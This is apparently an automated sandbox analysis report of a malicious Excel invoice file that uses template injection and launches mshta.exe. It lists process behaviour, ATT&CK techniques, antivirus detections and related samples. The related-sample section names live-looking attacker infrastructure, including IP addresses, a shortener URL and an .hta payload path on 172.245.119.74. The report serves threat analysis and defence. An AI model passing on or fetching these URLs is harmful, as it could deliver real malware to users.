Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Invoice#T5O2025.xlsStatic file information: File size 1275904 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF3A8EE2EC90F693B8.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Invoice#T5O2025.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Invoice#T5O2025.xlsStream path 'Workbook' entropy: 7.99903041342 (max. 8.0)
Source: 18040000.0.drStream path 'Workbook' entropy: 7.99606742362 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 876Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Invoice#T5O2025.xls25%VirustotalBrowse
Invoice#T5O2025.xls39%ReversingLabsDocument-Excel.Exploit.TempInj
Invoice#T5O2025.xls100%AviraEXP/TempInj.MN
Invoice#T5O2025.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    high
    s-part-0017.t-0009.fb-t-msedge.net
    13.107.253.45
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mallfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      14.103.79.10
      s.deemos.comChina
      18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
      172.245.119.74
      unknownUnited States
      36352AS-COLOCROSSINGUSfalse
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1592495
      Start date and time:2025-01-16 08:24:10 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 26s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Invoice#T5O2025.xls
      Detection:MAL
      Classification:mal80.expl.winXLS@6/9@1/2
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to French - France
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Active ActiveX Object
      • Active ActiveX Object
      • Active ActiveX Object
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
      • Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 52.109.28.47, 2.22.50.131, 2.22.50.144, 51.116.253.169, 51.105.71.137, 40.126.32.72, 52.149.20.212, 13.107.253.45
      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, onedscolprdgwc04.germanywestcentral.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, onedscolprduks03.uksouth.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      TimeTypeDescription
      02:26:26API Interceptor927x Sleep call for process: splwow64.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      14.103.79.10Order.xlsGet hashmaliciousUnknownBrowse
        Order.xlsGet hashmaliciousUnknownBrowse
          Order.xlsGet hashmaliciousUnknownBrowse
            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                  P-04071A.xlsGet hashmaliciousUnknownBrowse
                    P-04071A.xlsGet hashmaliciousUnknownBrowse
                      P-04071A.xlsGet hashmaliciousUnknownBrowse
                        Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          172.245.119.74Order.xlsGet hashmaliciousUnknownBrowse
                          • 172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          s.deemos.comOrder.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          s-part-0017.t-0009.fb-t-msedge.nethttps://link.edgepilot.com/s/62bf622f/uVTE_PYEIEirHx_sVIJYBQ?u=https://www.google.com/url?sa=https://r20.rs6.net/tns.jsp?f=t%26rct=j%26q=%26esrc=s%26source=web%26cd=%26cad=rja%26uact=8%26ved=2ahUKEwj_UJK636660tcVNh_0HHcggMUkQFnoECB0QAQ%26url=amp/s/avastroy.by/%2577%2570%252D%2563%256F%256E%2574%2565%256E%2574%252F%2572%2565%2564%252E%2568%2574%256D%256CGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.253.45
                          009.vbeGet hashmaliciousAgentTeslaBrowse
                          • 13.107.253.45
                          download.ps1Get hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.253.45
                          https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          https://www.databreachtoday.com/showOnDemand.php?webinarID=6054&rf=OD_REQUEST;Get hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                          • 13.107.253.45
                          29617afb-25a0-12a3-3c27-9464d2b37792.emlGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086Get hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          9179390927_20250115_155451.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.253.45
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WORLDPHONE-INASNumberforInterdomainRoutingINOrder.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          5.elfGet hashmaliciousUnknownBrowse
                          • 14.103.40.242
                          AS-COLOCROSSINGUSOrder.xlsGet hashmaliciousUnknownBrowse
                          • 172.245.119.74
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 172.245.119.74
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 172.245.119.74
                          19MgUpI9tj.dllGet hashmaliciousWannacryBrowse
                          • 107.175.251.2
                          a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 23.95.72.10
                          rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                          • 23.95.73.77
                          rebirth.arm4.elfGet hashmaliciousGafgytBrowse
                          • 23.95.73.77
                          m-p.s-l.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 23.95.72.10
                          s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 23.95.72.10
                          rebirth.arm6.elfGet hashmaliciousGafgytBrowse
                          • 23.95.73.77
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          6271f898ce5be7dd52b0fc260d0662b3Order.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Order.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
